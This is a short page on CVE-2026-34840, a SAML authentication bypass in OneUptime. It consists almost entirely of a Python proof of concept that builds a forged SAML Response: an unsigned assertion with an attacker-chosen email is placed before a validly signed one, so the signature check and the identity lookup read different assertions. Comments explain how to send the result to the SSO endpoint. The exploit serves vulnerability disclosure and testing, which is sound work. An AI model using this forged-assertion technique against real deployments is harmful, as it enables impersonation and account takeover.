CVE-2026-34840 OneUptime SAML认证绕过漏洞

import base64 from defusedxml.lxml import tostring from lxml import etree # Conceptual PoC for CVE-2026-34840 # This demonstrates how to structure a SAML Response with two assertions # where the first (unsigned) contains the attacker's identity. def create_malicious_saml(): # 1. The unsigned assertion containing the attacker's controlled identity unsigned_assertion = """ <saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="unsigned-assertion-1"> <saml:Subject> <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">[email protected]</saml:NameID> </saml:Subject> <saml:Conditions NotBefore="2026-04-01T00:00:00Z" NotOnOrAfter="2026-04-02T00:00:00Z"/> </saml:Assertion> """ # 2. The legitimate signed assertion (normally obtained from a valid user flow) # For demonstration, we assume a structure that would pass xml-crypto validation signed_assertion = """ <saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion" ID="signed-assertion-2"> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <!-- Valid Signature Data Here --> </ds:Signature> <saml:Subject> <saml:NameID Format="urn:oasis:names:tc:SAML:1.1:nameid-format:emailAddress">[email protected]</saml:NameID> </saml:Subject> <saml:Conditions NotBefore="2026-04-01T00:00:00Z" NotOnOrAfter="2026-04-02T00:00:00Z"/> </saml:Assertion> """ # 3. Combine them: Prepend the malicious unsigned assertion before the signed one # The vulnerability is that isSignatureValid() checks the signature in signed_assertion # but getEmail() reads identity from unsigned_assertion malicious_response = f""" <samlp:Response xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol" ID="_id"> {unsigned_assertion} {signed_assertion} </samlp:Response> """ return malicious_response if __name__ == "__main__": # In a real attack, this XML would be Base64 encoded and sent to the SSO ACS endpoint poc_xml = create_malicious_saml() print("Generated Malicious SAML Structure:") print(poc_xml)